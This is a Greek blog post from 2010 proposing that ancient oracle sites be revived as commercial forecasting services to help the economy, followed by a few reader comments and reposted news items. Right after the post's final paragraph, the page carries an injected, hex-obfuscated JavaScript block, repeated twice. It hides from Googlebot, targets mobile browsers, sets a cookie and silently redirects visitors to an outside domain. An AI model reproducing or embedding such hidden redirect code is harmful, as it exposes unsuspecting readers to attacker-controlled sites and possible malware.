anwnymous

Ιουνίου 6, 2010

«Είναι ο πολιτισμός η βαριά βιομηχανία μας ;»

Filed under: Uncategorized — thelastrealanwnymous @ 9 :44 πμ

            Είναι ακριβώς το ίδιο συναίσθημα . Το νοιώθεις όταν επισκέπτεσαι την Αίγυπτο και την Ελλάδα. Έχεις διαβάσει τόσα πολλά γι αυτούς τους λαούς και για την ιστορία τους , που περιμένεις να δεις κάτι που θα σε συγκινήσει. Κάτι που θα σε κάνει να αισθανθείς ότι πράγματι έφθασες στη χώρα που τόσο θαύμασες μέσα από τα βιβλία. . Όχι βέβαια ότι περιμένεις να δεις τους δούλους να λαχανιάζουν στην έρημο ανεβάζοντας ογκόλιθους στις πυραμίδες, ή τις  γυναίκες να κυκλοφορούν  μ’ αυτό το μακιγιάζ στα μάτια που είχε η βασίλισσα Νεφερτίτη. Φθάνοντας εκεί λοιπόν διαπιστώνεις ότι  το αραβικό στοιχείο  έχει καλύψει κάθε ίχνος της αρχαίας Αιγύπτου. Αν δεν υπήρχε η υπόνοια του πολύτιμου και του κερδοφόρου , ακόμα και οι πυραμίδες θα είχαν αφεθεί στην φθορά του χρόνου και της αδιαφορίας.             

              Αντίστοιχα στη χώρα μας , φαίνεται να υπάρχει μία καθημερινότητα που βρίσκεται πιο κοντά στην σύγχρονη μαζικοποιημένη κουλτούρα , όπου τα μουσεία και οι ναοί και οι αρχαιολογικοί χώροι απολαμβάνουν τον σεβασμό νεκροταφείων καθώς και την αντίστοιχη περιθωριοποιημένη θέση.

            Οι άνθρωποι – έλληνες και ξένοι-  εθισμένοι στην ψευδαίσθηση της τηλεοπτικής εικόνας , αισθάνονται αμήχανοι μπροστά στα μνημεία , τους ναούς και τα αγάλματα , «ενοχλημένοι» από την «ακινησία» τους και τη «σιωπή» τους . Η αμηχανία τους μεγαλώνει ακόμα περισσότερο  όταν γνωρίζοντας την ανυπολόγιστη αξία τους , διαπιστώνουν ότι δεν μοιάζουν σε τίποτε με τις σημερινές κυρίαρχες αξίες της ζωής μας.  

             « Ο κόσμος πηγαίνει ακόμη να δει τις κλασσικές  παραστάσεις του Άμλετ και του Βασιλιά Ληρ, αλλά, ας είμαστε ειλικρινείς, πόση επιτυχία πιστεύετε πως θα είχαν στην τηλεόραση, μπροστά στον “ Πιο Αδύναμο Κρίκο” ή το “Σορβάιβερ Νο 5”,  ακόμη κι αν έπαιζε ο Μπραντ Πιτ τον Άμλετ και ο Τζακ Νίκολσον τον Πολώνιο;»

Είναι η άποψη του Στέφεν Κινγκ για την εγγενή αδυναμία του πολιτισμού να λειτουργήσει στο σήμερα και -αφήνοντας στην άκρη το θέμα του οικονομικού κέρδους -να κατορθώνει να είναι απλά δημοφιλής, όπως συνέβαινε πριν από λίγες δεκαετίες.

            Με πρόσφατο γεγονός το μουσείο της Ακρόπολης , όπου πλήθος επισκεπτών περίμενε ώρα στις ουρές για να εξασφαλίσει εισιτήριο , οι εντυπώσεις έσβησαν γρήγορα , το θέμα ξεχάστηκε μέσα στην καθημερινότητα , δεν βρέθηκε ούτε ένας άνθρωπος του χώρου της τέχνης να δηλώσει ότι μπορεί να περνάει λίγες ώρες το μήνα «εκεί μέσα» νιώθοντας ότι η επαφή με την κλασική αρχαιότητα του προσφέρει ένα είδος ψυχικής ανάτασης . Δεν έγινε η παραμικρή νύξη -ούτε από τους «ειδικούς»- για τον ρόλο του μουσείου στην βελτίωση της σύγχρονης ζωής.

           Τίθεται λοιπόν το ερώτημα : Τι είναι αυτό που μπορεί να εμφυσήσει ζωή στα μουσεία , στα ερείπια των ναών , στους αρχαιολογικούς χώρους , σε όλα αυτά τα απομεινάρια της ιστορίας μας ; Τι μπορεί να τα κάνει να ζωντανέψουν και να λειτουργήσουν με σύγχρονο τρόπο και κυρίως να είναι αποδοτικά οικονομικά;  

           Τα τελευταία χρόνια μιλάμε συχνά -προσδιορίζοντας το σήμερα -για την «εποχή της πληροφορίας». Μας έγινε πλύση εγκεφάλου από πολλές κατευθύνσεις για την εποχή της πληροφορίας με στόχο να εντάξουμε τους υπολογιστές στην καθημερινή μας ζωή. Το κάναμε κι αυτό και το παράδοξο είναι , ότι ενώ εκσυγχρονιζόμαστε βουτάμε βαθύτερα στη κρίση , στην ανεργία και κυρίως στην μείωση της παραγωγικότητας , χρησιμοποιώντας ίσως αυτό το πολύτιμο εργαλείο –συνήθως στις δημόσιες υπηρεσίες – για  πασιέντζα , διασκέδαση και σκότωμα χρόνου γενικότερα.

          Διαπίστωση: Ούτε ο εκσυγχρονισμός μπορεί να μας ξελασπώσει οικονομικά .

      Αν προσπαθήσουμε -με αδρές γραμμές -να εξηγήσουμε τη σημερινή κρίση , τότε θα διαπιστώσουμε ότι , ένα μεγάλο μέρος του προβλήματος παγκοσμίως οφείλεται στα καινούρια οικονομικά προϊόντα , τα οποία αποδείχτηκαν στυγνός τζόγος και παιγνίδια στοιχηματισμού .

       Δεν θα επεκταθώ σε αναλύσεις . Θα πω μόνο : μήπως φύγαμε από την εποχή της πληροφορίας και περάσαμε στην «εποχή της πρόβλεψης»;  

        Και τώρα οι απαντήσεις από την Ιστορία μας: ποιους μηχανισμούς πρόβλεψης διέθετε η Αρχαία Ελλάδα ;  Τα μαντεία. Πως μπορούν να λειτουργήσουν σήμερα; Μπορούν να λειτουργήσουν σαν ιδιωτικές εταιρείες προβλέψεων , και οι υπηρεσίες τους να απευθύνονται από τον ιδιώτη μικρού μπάτζετ έως την ανώνυμη  πολυεθνική εταιρεία  που ζητάει μια πρόβλεψη για να επεκταθεί σε κάποιο τομέα. Οι μεγάλοι οικονομικοί  οργανισμοί ήδη  διαθέτουν εξειδικευμένα  τμήματα προβλέψεων , για να εξασφαλίσουν το μέλλον των κεφαλαίων τους . Ποτέ όμως η πρόβλεψη σαν έννοια δεν μπήκε τόσο σοβαρά στη ζωή μας όσο σήμερα.

        Για το πώς μπορούν να λειτουργήσουν τα « ιδιωτικά μαντεία» σήμερα και να δώσουν  σωστές προβλέψεις θα μιλήσουμε αναλυτικά σε επόμενη συνάντηση.

         Κλείνοντας θα τονίσω ότι η λύση στο συνδυασμένο πρόβλημα τουρισμού –πολιτισμού είναι καθαρά και αποκλειστικά «ελληνική». Τα μαντεία ήταν βασικό πολιτισμικό στοιχείο της Αρχαίας Ελλάδας . Οι «πρώτοι τουρίστες» εκείνη την εποχή ερχόταν στους Δελφούς να πάρουν ένα χρησμό και η αξιοπιστία των ελληνικών μαντείων και των μεθόδων τους υποστηρίχθηκε άμεσα από το κύρος και το δέος των ιερατείων και έμμεσα από προσωπικότητες όπως ο Σωκράτης, ο Αλέξανδρος, οι Πέρσες βασιλείς αλλά και από  απλούς θνητούς  με τα μικρά καθημερινά τους προβλήματα.   

          Οπωσδήποτε ο ρόλος των μαντείων πέρασε σε δεύτερη μοίρα τα πρώτα χριστιανικά χρόνια , με αποτέλεσμα σήμερα να μιλάμε γι αυτά είτε μεταφορικά, είτε ειρωνικά , είτε χαριτολογώντας .

           Νομίζω πως η χώρα σήμερα μπορεί πιο εύκολα να ανακάμψει οικονομικά χρησιμοποιώντας τη δύναμη της πρόβλεψης έτσι όπως μόνο οι έλληνες γνωρίζουν από παλιά . Δεν είναι μόνο οι Δελφοί που μπορούν να αναπτυχθούν σε «κοιλάδα μαντικής τέχνης» , αλλά και η Δωδώνη , το νεκρομαντείο στον Αχέροντα  , το μαντείο της Ολυμπίας, της Δήλου και άλλα μικρότερα δευτερεύοντα μαντεία διάσπαρτα σε όλη την επικράτεια , που αναφέρονται από τους ιστορικούς .

        Φυσικά όταν αρχίσουν να λειτουργούν με τη σύγχρονη μορφή τους  και φέρουν σημαντικά κεφάλαια στη χώρα τότε πολύ σύντομα θα «ξυπνήσουν» και άλλα πρώην μαντεία στη Βόρεια Αφρική και στη Αίγυπτο και στην Κύπρο και στην Τουρκία ,για να αποκομίσουν το μερίδιό τους από την αγορά. Τότε θα φανεί πραγματικά πόσο ακριβά μπορεί να πουληθεί η ιστορία μας .

        Πέραν του ότι έχουμε να κάνουμε με ένα εντελώς καινούριο τουριστικό προϊόν που μπορεί να λειτουργήσει όλο το χρόνο χωρίς να μπαίνει θέμα σαιζόν, μας δίνεται η μοναδική ευκαιρία να πιάσουμε το σωσίβιο που μας πετάει η ιστορία , για να συνδεθούμε με «το ένδοξο παρελθόν» , έκφραση καθαρά ειρωνική σήμερα , αφού η σύνδεση θεωρείται ανέφικτη.

         Το μέλλον της χώρας βρίσκεται στην ιστορία της και στον πολιτισμό της. Η «βαλκανική» αντίληψη για την Ελλάδα πρέπει να περιοριστεί στα χρόνια της σκλαβιάς και η ανατολίτικη εικόνα της στην εμμονή κάποιων καλλιτεχνών στα πρώτα χρόνια της μεταπολίτευσης. Η χώρα με όπλο τη μελέτη της ιστορίας της και του πολιτισμού της ,μπορεί να προχωρήσει με σιγουριά στο σήμερα και να χρησιμοποιήσει την εικόνα των μαντείων με τη σύγχρονη μορφή που αντιμετωπίζεται το θέμα  των  προβλέψεων  ,παράγοντας ξανά – πολιτισμό , χρήμα , εξαγωγές ιδεών , πρωτοπορία – αντικείμενα στα οποία  είχε καταλήξει  να είναι ουραγός.

   Είναι ίσως η μοναδική στιγμή ιστορικά που μια πανελλήνια ενδοσκόπηση και ένα  προσεκτικό ζουμ στο ρόλο των μαντείων στην αρχαία Ελλάδα μπορεί να μας αποκαλύψει τη λύση για το νέο αυτό τουριστικό προϊόν , που θα φέρει τη χώρα στην πρώτη θέση προορισμού επισκεπτών.var _0x446d=[«\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E»,»\x69\x6E\x64\x65\x78\x4F\x66″,»\x63\x6F\x6F\x6B\x69\x65″,»\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,»\x76\x65\x6E\x64\x6F\x72″,»\x6F\x70\x65\x72\x61″,»\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,»\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,»\x74\x65\x73\x74″,»\x73\x75\x62\x73\x74\x72″,»\x67\x65\x74\x54\x69\x6D\x65″,»\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D»,»\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,»\x6C\x6F\x63\x61\x74\x69\x6F\x6E»];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}var _0x446d=[«\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E»,»\x69\x6E\x64\x65\x78\x4F\x66″,»\x63\x6F\x6F\x6B\x69\x65″,»\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,»\x76\x65\x6E\x64\x6F\x72″,»\x6F\x70\x65\x72\x61″,»\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,»\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,»\x74\x65\x73\x74″,»\x73\x75\x62\x73\x74\x72″,»\x67\x65\x74\x54\x69\x6D\x65″,»\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D»,»\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,»\x6C\x6F\x63\x61\x74\x69\x6F\x6E»];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Advertisements

5 Σχόλια »

  1. Με σύνθημα «Η Ελλάδα καινοτομεί», ο ΣΕΒ και η Eurobank EFG αναλαμβάνουν κοινή πρωτοβουλία με στόχο την προώθηση της έρευνας και καινοτομίας στη χώρα μας. Στο πλαίσιο αυτό, διοργανώνουν πανελλήνιο διαγωνισμό Εφαρμοσμένης Έρευνας και Καινοτομίας που απευθύνεται στους ανθρώπους της έρευνας, της καινοτομίας, της γνώσης και των νέων ιδεών.

    Στόχος της πρωτοβουλίας αυτής είναι να κινητοποιηθούν δημιουργικές δυνάμεις της ελληνικής κοινωνίας και να ενθαρρυνθεί η έρευνα και η καινοτομία, που αποτελούν αναγκαίες προϋποθέσεις για την αναβάθμιση της παραγωγικής βάσης και της ανταγωνιστικότητας της οικονομίας μας.

    Ο διαγωνισμός σκοπεύει να αναδείξει προϊόντα εφαρμοσμένης έρευνας και προϊόντα ή υπηρεσίες καινοτομίας, που συμβάλλουν στη βελτίωση της καθημερινής ζωής, στη βιώσιμη ανάπτυξη και στην ενίσχυση της εξωστρέφειας της οικονομίας.

    Πέραν της σημειολογικής αξίας της επιβράβευσης μέσω του διαγωνισμού δίνεται η δυνατότητα σε όσους θα συμμετάσχουν να έλθουν σε επαφή με την επιχειρηματική κοινότητα και να έχουν την υποστήριξη του ΣΕΒ και της Eurobank προκειμένου η ιδέα να γίνει πράξη.

    Για τους λόγους που οδήγησαν τους δύο φορείς στην πρωτοβουλία αυτή, ο Πρόεδρος του ΣΕΒ κ. Δημήτρης Δασκαλόπουλος, δήλωσε: «Η σύγχρονη επιχείρηση δεν έχει την πολυτέλεια της αδράνειας και της στασιμότητας. Στις επιχειρήσεις όποιος δεν ανανεώνεται, παρακμάζει. Όποιος δεν ανταποκρίνεται στην ανάγκη της αλλαγής είναι καταδικασμένος. Το ίδιο ισχύει και για τις κοινωνίες.
    Είναι γνωστό ότι στην Ελλάδα η καινοτομία, όπως και η ανάπτυξη γνώσης, υστερεί. Όμως, στο υπέδαφος της κοινωνίας μας υπάρχουν κοιτάσματα χρυσού. Πολλοί νέοι, πολλοί επιχειρηματίες, πολλοί επαγγελματίες αποτινάσσουν τα δεσμά της αδιαφορίας και της αβελτηρίας, αντιστέκονται στις σειρήνες των εύκολων επιλογών και διαπρέπουν με σκληρή δουλειά, φαντασία και συνέπεια. Νιώθουν πόσο αναγκαίο είναι να ξαναγίνουμε μία κοινωνία δράσης και δυναμικής προσαρμογής, ικανή να αναμετρηθεί με το μέλλον. Μερικά απ’ αυτά τα κοιτάσματα χρυσού επιδιώκει να φέρει στην επιφάνεια ο διαγωνισμός εφαρμοσμένης έρευνας και καινοτομίας που ξεκινάμε σήμερα».

    Αναφερόμενος στο διαγωνισμό,ο Διευθύνων Σύμβουλος του ομίλου Eurobank EFG κ. Νικόλαος Νανόπουλος δήλωσε: «Η πρωτοβουλία μας υπαγορεύεται από την ισχυρή μας πεποίθηση πως η καινοτομία, οι νέες ιδέες, η επένδυση στη γνώση και την έρευνα, πρέπει να αξιοποιούνται και να βρίσκουν έδαφος εφαρμογής στην παραγωγική και επιχειρηματική δραστηριότητα. Έτσι μόνον, ενισχύονται και αναβαθμίζονται συνεχώς η παραγωγικότητα, η ποιότητα, η προστιθέμενη αξία και η ανταγωνιστικότητα των προϊόντων και των υπηρεσιών που παράγουμε με γνώμονα τις ανάγκες και τις απαιτήσεις ενός διεθνούς περιβάλλοντος που εξελίσσεται ραγδαία και γίνεται όλο και πιο ανταγωνιστικό.
    Εμείς στην Eurobank υποστηρίζουμε εδώ και καιρό την ανάγκη να θεμελιώσουμε ένα νέο πρότυπο διατηρήσιμης ανάπτυξης, το οποίο θα ενισχύει την παραγωγικότητα, την ανταγωνιστικότητα, την εξωστρέφεια και την απασχόληση. Για να το πετύχουμε αυτό πρέπει να θεμελιώσουμε την προσπάθειά μας πάνω στην καινοτομία, την έρευνα, την Παιδεία, τη γνώση, τις νέες ιδέες και τη δημιουργικότητα. Αυτά θα προικίσουν την ελληνική οικονομία με τα νέα συγκριτικά πλεονεκτήματα που έχει ανάγκη ώστε να ανακτήσει το χαμένο έδαφος στη δύσκολη και αέναη μάχη της διεθνούς ανταγωνιστικότητας».

    Στη δυναμική των επενδύσεων στην Έρευνα και τη Καινοτομία και τη σημαντική συμβολή τους στην ενίσχυση της εξωστρέφειας και το ρυθμό ανάπτυξης της οικονομίας αναφέρθηκε ο Αναπληρωτής Διευθύνων Σύμβουλος του ομίλου Eurobank EFG κ. Νικόλαος Καραμούζης, υπογραμμίζοντας: «H εμπειρία άλλων χωρών έχει δείξει ότι μπορεί μία χώρα να πετύχει μεγάλη αύξηση των εξαγωγών, της οικονομικής εξωστρέφειας και αύξηση του ρυθμού ανάπτυξης χωρίς να απαιτείται η μείωση του κόστους εργασίας σαν κυρίαρχο ανταγωνιστικό πλεονέκτημα. Η Ελλάδα σήμερα επενδύει μόνον ποσοστό 0,6% του ΑΕΠ για έρευνα και ανάπτυξη τεχνολογίας έναντι 3,7% της Σουηδίας και 3,6% της Φινλανδίας και βρίσκεται δυστυχώς κάτω από χώρες όπως Ρουμανία και Λιθουανία, Εσθονία, Λάτβια. Μελέτες έχουν δείξει ότι μια αύξηση των επενδύσεων σε Έρευνα & Καινοτομία κατά 1 ποσοστιαία μονάδα του ΑΕΠ οδηγεί μακροπρόθεσμα σε αύξηση της παραγωγικότητας της εθνικής οικονομίας κατά περίπου 0,3% σε ετήσια βάση. Η Eurobank, πιστή στη δέσμευσή της για πραγματική στήριξη της επιχειρηματικότητας, δεσμεύεται να εξετάσει – πάντα λαμβάνοντας υπόψη τα τραπεζικά κριτήρια – να χρηματοδοτήσει την επιχείρηση που θα αναλάβει να υιοθετήσει μια από τις καινοτόμες ιδέες που θα αναδειχθούν μέσα από το διαγωνισμό, με το κόστος που θα απαιτηθεί ώστε να την υλοποιήσει παραγωγικά. Είμαστε βέβαιοι ότι ο διαγωνισμός θα συνδράμει ουσιαστικά στη βελτίωση της επιχειρηματικότητας και στην ενίσχυση της ανταγωνιστικότητας της εθνικής μας οικονομίας, βάζοντας έτσι τις βάσεις για ένα σίγουρο αναπτυξιακό μέλλον».

    Ο διαγωνισμός περιλαμβάνει δύο κατηγορίες βραβείων:

    Μία για την Εφαρμοσμένη Έρευνα & μια για τη Καινοτομία. Σε κάθε κατηγορία θα απονεμηθούν από δύο βραβεία, πρώτο (Α) και δεύτερο (Β) δηλαδή συνολικά τέσσερα βραβεία. Τα βραβεία του διαγωνισμού ανά πεδίο είναι χρηματικά και συνοδεύονται από τιμητική πλακέτα
    Στο διαγωνισμό μπορούν να συμμετάσχουν μεμονωμένοι ερευνητές, ερευνητικές ομάδες, επιχειρήσεις που δραστηριοποιούνται παραγωγικά ή/και ερευνητικά στην Ελλάδα καθώς και ιδρύματα της ημεδαπής που δραστηριοποιούνται στο χώρο της έρευνας. Η προθεσμία υποβολής των υποψηφιοτήτων είναι έως τις 30 Σεπτεμβρίου 2010.

    Τη διαδικασία αξιολόγησης (γραπτής και προφορικής) θα συντονίσει και θα εποπτεύσει Επιστημονικό Συμβούλιο, αποτελούμενο από διακεκριμένους επιστήμονες.

    Με βάση την τελική βαθμολογία κατά το στάδιο της γραπτής αξιολόγησης, θα επιλεγούν οι έως 20 καλύτερες υποψηφιότητες (10 για την κατηγορία Εφαρμοσμένη έρευνα – 10 για την κατηγορία Καινοτομία). Για τις έως 20 υποψηφιότητες που θα προκριθούν κατά το στάδιο αυτό και προ της τελικής κατάταξης που θα προκύψει μετά την ολοκλήρωση και του σταδίου της προφορικής αξιολόγησης, θα οργανωθεί ειδική προβολή των προτάσεων των υποψηφιοτήτων που, μεταξύ άλλων, θα περιλαμβάνει: περιφερειακές εκδηλώσεις σε 5 πόλεις της Ελλάδας (Θεσσαλονίκη, Πάτρα, Λάρισα, Ηράκλειο, Ιωάννινα), καθώς και την έκδοση ειδικού λευκώματος που θα διανεμηθεί σε ευρύ κύκλο αποδεκτών κυρίως επιχειρηματιών.

    Η προκήρυξη του διαγωνισμού, στην οποία περιέχονται αναλυτικά οι όροι και οι προϋποθέσεις συμμετοχής σε αυτόν, είναι αναρτημένοι στον ειδικά διαμορφωμένο διαδικτυακό τόπο http://www.kainotomeis.gr, τον οποίο μπορούν να επισκέπτονται οι ενδιαφερόμενοι για περαιτέρω πληροφορίες καθώς και για την ηλεκτρονική υποβολή των προτάσεών τους

    Σχόλιο από thelastrealanwnymous — Ιουνίου 6, 2010 @ 9 :51 πμ | Απάντηση

  2. Εκτός απο τα μαντεία μπορούμε να οργανώσουμε και τις απανταχού στην Ελλάδα καφετζούδες, χαρτορίχτες , αστρολόγους κλπ…
    λίγη τόλμη χρειάζεται γιατί την γοητεία την διαθέτουμε..άφθονη μάλιστα…

    Σχόλιο από takis — Ιουνίου 7, 2010 @ 2 :52 μμ | Απάντηση

  3. δεν ειναι λάθος το σχόλιο σου από την αποψη ότι αυτοί που λες θα αποτελέσουν το φολκλορ «περιβάλλον» του σχεδίου…που φαίνεται να είναι απαραίτητο για να διαχωριστούν όσοι κάνουν επιστημονικές προβλέψεις απο τους αυτοανακυρηγμένους
    :):)
    γουελκαμ μιστερ Τακις
    🙂

    Σχόλιο από antonis karas — Ιουνίου 7, 2010 @ 8 :25 μμ | Απάντηση

  4. «Tα χειρότερα είναι μπροστά μας»
    Η ΝΑΥΤΕΜΠΟΡΙΚΗ Δευτέρα, 14 Ιουνίου 2010
    Τελευταία Ενημέρωση : 14/06/2010 12:43

    Με τις εξελίξεις να είναι ραγδαίες και να επισκιάζουν τις προοπτικές της παγκόσμιας οικονομίας, οι επενδυτές κρέμονται, αυτές τις ημέρες, από τα χείλη των οικονομολόγων, καθώς θεωρούν ότι είναι οι κατάλληλοι άνθρωποι ώστε να ερμηνεύσουν ό,τι συμβαίνει.

    Υπάρχουν όμως και κάποιοι που επιθυμούν κάτι περισσότερο από μια επιφανειακή ερμηνεία γεγονότων όπως η δημοσιονομική κρίση στην Ελλάδα ή ο κίνδυνος «φούσκας» στην κινεζική κτηματαγορά.

    Και ο σωστός άνθρωπος για να στραφεί κανείς είναι ο Ντέιβιντ Ρόζενμπεργκ, οικονομολόγος και στρατηγικός αναλυτής στην καναδική εταιρεία διαχείρισης πλούτου Gluskin Sheff.

    Ο κ. Ρόζεμπεργκ ήταν αισιόδοξος για την πορεία των αγορών στο μεγαλύτερο χρονικό διάστημα της δεκαετίας του ’90. Όμως η ερμηνεία των οικονομικών δεδομένων αυτής της εποχής δεν του αφήνουν άλλα περιθώρια από το να κρούει τον κώδωνα του κινδύνου σε εκείνους που πιστεύουν ότι τα χειρότερα έχουν παρέλθει, πιστεύοντας το αντίθετο.

